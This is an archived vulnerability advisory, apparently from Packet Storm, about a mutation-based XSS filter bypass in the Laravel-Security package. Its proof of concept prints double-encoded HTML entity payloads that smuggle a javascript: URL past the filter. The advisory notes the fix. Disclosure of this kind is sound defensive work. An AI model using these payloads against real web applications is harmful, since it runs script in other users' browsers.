Exploit the possiblities

Lavarel-Security XSS Filter Bypass

Lavarel-Security XSS Filter Bypass
Posted Apr 29, 2014
Authored by Rafay Baloch

Lavarel-Security cross site scripting filter suffers from a bypass vulnerability.

tags | exploit, xss, bypass
MD5 | 82d3e66a425cd7e997c924715a185f58

Lavarel-Security XSS Filter Bypass

Change Mirror Download
*#Product: Lavarel-Security XSS Filter Bypass*
*#Vulnerability: Mutation Based XSS Bypass *
*#Impact: Medium/High*
*#Authors: Rafay Baloch *
*#Company: RHAinfoSEC *
*#Website: http://rhainfosec.com
*#Status: Fixed*

*=========*
*Description*
*=========*

Laravel Security is a port of the security class from Codeigniter 2.1 for
Laravel 4.1. It relies upon a blacklist approach to filter out common
malicious inputs.

*=========*
*Vulnerability*
*==========*

The vulnerability lies in the fact that the XSS filter was decoding HTML
entities, therefore based upon this fact it was
possible to construct a payload that would successfully bypass the
filtering mechanisms and execute javascript.

*=============*
*Proof of concept*
*=============*

During intial test the following input was provided:

<a
href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a>

The filter decodes the HTML entities and hence the attack was being
blocked.

After Decoding:

<a href="javascript:alert(1)">Clickhere</a>

Next, we double encoded the entities:

<a
href="&#38&#35&#49&#48&#54&#38&#35&#57&#55&#38&#35&#49&#49&#56&#38&#35&#57&#55&#38&#35&#49&#49&#53&#38&#35&#57&#57&#38&#35&#49&#49&#52&#38&#35&#49&#48&#53&#38&#35&#49&#49&#50&#38&#35&#49&#49&#54&#38&#35&#53&#56&#38&#35&#57&#57&#38&#35&#49&#49&#49&#38&#35&#49&#49&#48&#38&#35&#49&#48&#50&#38&#35&#49&#48&#53&#38&#35&#49&#49&#52&#38&#35&#49&#48&#57&#38&#35&#52&#48&#38&#35&#52&#57&#38&#35&#52&#49">Clickhere</a>

And since the filter would decode the entities once, we are left with the
following:


<a
href="&#106&#97&#118&#97&#115&#99&#114&#105&#112&#116&#58&#99&#111&#110&#102&#105&#114&#109&#40&#49&#41">Clickhere</a>

Which is perfectly a valid syntax inside of href context and would execute
javascript.

*===*
*Fix*
*===*

The vulnerability has been fixed, the latest version doesn't decode HTML
entites and hence the attack is mitigated.


*==========*
*References*
*==========*

https://github.com/GrahamCampbell/Laravel-Security/issues/10#issuecomment-37816413

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

Want To Donate?


Bitcoin: 18PFeCVLwpmaBuQqd5xAYZ8bZdvbyEWMmU

File Archive:

January 2018

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    13 Files
  • 3
    Jan 3rd
    16 Files
  • 4
    Jan 4th
    39 Files
  • 5
    Jan 5th
    26 Files
  • 6
    Jan 6th
    40 Files
  • 7
    Jan 7th
    2 Files
  • 8
    Jan 8th
    16 Files
  • 9
    Jan 9th
    25 Files
  • 10
    Jan 10th
    28 Files
  • 11
    Jan 11th
    44 Files
  • 12
    Jan 12th
    32 Files
  • 13
    Jan 13th
    2 Files
  • 14
    Jan 14th
    4 Files
  • 15
    Jan 15th
    31 Files
  • 16
    Jan 16th
    15 Files
  • 17
    Jan 17th
    16 Files
  • 18
    Jan 18th
    24 Files
  • 19
    Jan 19th
    15 Files
  • 20
    Jan 20th
    5 Files
  • 21
    Jan 21st
    1 Files
  • 22
    Jan 22nd
    15 Files
  • 23
    Jan 23rd
    17 Files
  • 24
    Jan 24th
    35 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2018 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close